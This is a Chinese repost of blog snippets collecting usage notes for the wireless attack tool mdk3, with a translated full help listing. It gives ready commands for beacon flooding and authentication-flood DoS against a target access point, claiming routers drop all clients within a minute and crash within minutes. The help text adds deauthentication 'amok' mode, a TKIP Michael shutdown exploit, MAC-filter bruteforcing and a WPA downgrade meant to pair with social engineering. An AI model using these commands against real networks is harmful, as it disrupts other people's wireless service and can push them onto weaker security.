欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  科技

收集的有关mdk 3的使用方法

程序员文章站 2022-03-22 11:53:06
收集来自网络上的有关mdk3的一些使用方法以及技巧(持续更新) b beacon泛洪攻击 -f 指定wifi名称的文件夹 -n 加上wifi名称 -w Fake WEP encrypted stations 设置假的加密wep -g Fake 802.11b stations (54 Mbit/s) ......

  收集来自网络上的有关mdk3的一些使用方法以及技巧(持续更新)

 

b beacon泛洪攻击

 

-f 指定wifi名称的文件夹

 

-n 加上wifi名称

 

-w fake wep encrypted stations 设置假的加密wep

 

-g fake 802.11b stations (54 mbit/s) 设定每秒流速是54mbps

 

-c 信道

 

-s 设置流速,默认是50 (set speed in packets per second)

 

mdk3 wlan0 b -n test -w -g -c 1 -s 200
---------------------
作者:小人物哎
来源:csdn
原文:https://blog.csdn.net/bt517840374/article/details/79998391
版权声明:本文为博主原创文章,转载请附上博文链接!

 

命令为:mdk3 mon0 a -a mac(mac为你要攻击的目标mac)

开始洪水攻击,大部分路由器1分钟之内所有客户端掉线,3-5分钟对方ap就会当机

注:本工具使用会对周围无线信号造成较大干扰,甚至导致所在区域全部路由器当机!!!!

ecersecteam原创,转载请注明!

 

mdk usage:
mdk3 <interface> <test_mode> [test_options] #mdk3用法:mdk3 网卡 测试模式 测试选项

test modes: #测试模式

b - beacon flood mode #信标洪水模式 其实就是制造虚假ap干扰正常ap

options:
-n <ssid>
use ssid <ssid> instead of randomly generated ones #使用ssid <ssid>而不是随机生成的
-f <filename>
read ssids from file #从文件中读取ssid
-v <filename>
read macs and ssids from file. #从文件读取mac和ssid
-d
show station as ad-hoc #将站显示为ad-hoc
-w
set wep bit (generates encrypted networks) #设置wep位(生成加密网络)
-g
show station as 54 mbit # 显示工作站为54m
-t
show station using wpa tkip encryption #使用wpa tkip加密显示工作站
-a
show station using wpa aes encryption #使用wpa aes加密显示工作站
-m
use valid accesspoint mac from oui database #使用来自oui数据库的有效访问点mac
-h
hop to channel where ap is spoofed #跳到ap被欺骗的频道
this makes the test more effective against some devices/drivers #这使得测试对于某些设备/驱动程序更有效
but it reduces packet rate due to channel hopping. #但它减少了由于信道跳频的分组速率
-c <chan>
fake an ap on channel <chan>. if you want your card to hop on #在频道<chan>上创建ap。如果你想要你的卡上跳
this channel, you have to set -h option, too! #这个通道,你必须设置-h选项!
-s <pps>
set speed in packets per second (default: 50) #设置速度(以秒为单位)(默认值:50)
a - authentication dos mode # 身份验证洪水攻击

options:
-a <ap_mac>
only test the specified ap #只测试指定的ap
-m
use valid client mac from oui database #从oui数据库使用有效的客户端mac
-c
do not check for test being successful #不要检查测试是否成功
-i <ap_mac>
perform intelligent test on ap (-a and -c will be ignored) #在ap上执行智能测试(-a和-c将被忽略)
this test connects clients to the ap and reinjects sniffed data to keep them alive #此测试将客户端连接到ap,并重新注入嗅探的数据以保持活动
-s <pps>
set speed in packets per second (default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
p - basic probing and essid bruteforce mode #基本探测和essid bruteforce模式

use -f and -t option to enable ssid bruteforcing. #使用-f和-t选项来启用ssid bruteforcing。
options:
-e <ssid>
tell mdk3 which ssid to probe for # 告诉mdk3要探测的ssid
-f <filename>
read lines from file for bruteforcing hidden ssids #从文件中读取行以强制执行隐藏的ssid
-t <bssid>
set mac adress of target ap #设置目标ap的mac地址
-s <pps>
set speed (default: unlimited, in bruteforce mode: 300) # 设置速度(默认值:无限制,在bruteforce模式下:300)
-b <character set>
use full bruteforce mode (recommended for short ssids only!) #使用完全的bruteforce模式(建议只使用短ssid!)
use this switch only to show its help screen. #使用此开关仅显示其帮助屏幕

d - deauthentication / disassociation amok mode #deauthentication / disassociation攻击模式
kicks everybody found from ap #踢掉每个客户端
options:
-w <filename>
read file containing macs not to care about (whitelist mode) #白名单模式 读取包含mac的文件以运行测试
-b <filename>
read file containing macs to run test on (blacklist mode) #黑名单模式 读取文件中的运行测试mac运行测试
-s <pps>
set speed in packets per second (default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
-c [chan,chan,chan,...]
enable channel hopping. without providing any channels, mdk3 will hop an all #设置信道跳跃如果没指定,mdk3会跳一个
14 b/g channels. channel will be changed every 5 seconds. #14 b / g通道。信道每5秒更改一次
m - michael shutdown exploitation (tkip) #mac关闭利用
cancels all traffic continuously #连续取消所有流量
-t <bssid>
set mac address of target ap #设置目标ap的mac地址
-w <seconds>
seconds between bursts (default: 10) #突发之间的秒数(默认值:10)
-n <ppb>
set packets per burst (default: 70) #设置每个数据包的数据包(默认值:70)
-j
use the new tkip qos-exploit #使用新的tkip qos-exploit
needs just a few packets to shut ap down! #需要几个数据包才能关闭ap!
-s <pps>
set speed (default: 400) #设置速度(默认值:400)

w - wids/wips/wds confusion
将wds与多认证客户端混淆,从而弄乱路由表
-e <ssid>
ssid of target wds network #目标wds网络的ssid
-c [chan,chan,chan...]
use channel hopping #使用信道跳跃
-z
激活zero_chaos的wids攻击
(验证客户端从wds到外部ap,使wids变得坚果)
f - mac filter bruteforce mode #mac过滤器强制模式
此测试使用已知客户端mac地址的列表,并尝试
在动态改变的同时向给定ap认证它们
其响应超时以获得最佳性能。它目前只工作
对正确拒绝开放身份验证请求的ap
-t <bssid>
target bssid #目标bssid
-m <mac>
set the mac adress range to use (3 bytes, i.e. 00:12:34) #设置要使用的mac地址范围(3字节,即00:12:34)
without -m, the internal database will be used #如果没有-m,将使用内部数据库
-f <mac>
set the mac adress to begin bruteforcing with #设置mac地址以开始强制
(note: you can't use -f and -m at the same time) #(注意:不能同时使用-f和-m)
g - wpa downgrade test #wpa降级测试
deauthenticates发送wpa加密数据包的站和ap。
有了这个测试,你可以检查sysadmin是否会尝试设置他的
网络到wep或禁用加密。 mdk3将使wep和未加密
客户端工作,所以如果系统管理员只是认为“wpa是破碎”他
肯定不是这个工作的正确。
(这可以/应该与社会工程相结合)
-t <bssid>
target network #目标网络
---------------------
作者:ynkhmiou
来源:csdn
原文:https://blog.csdn.net/cloudatlasm/article/details/72763566
版权声明:本文为博主原创文章,转载请附上博文链接!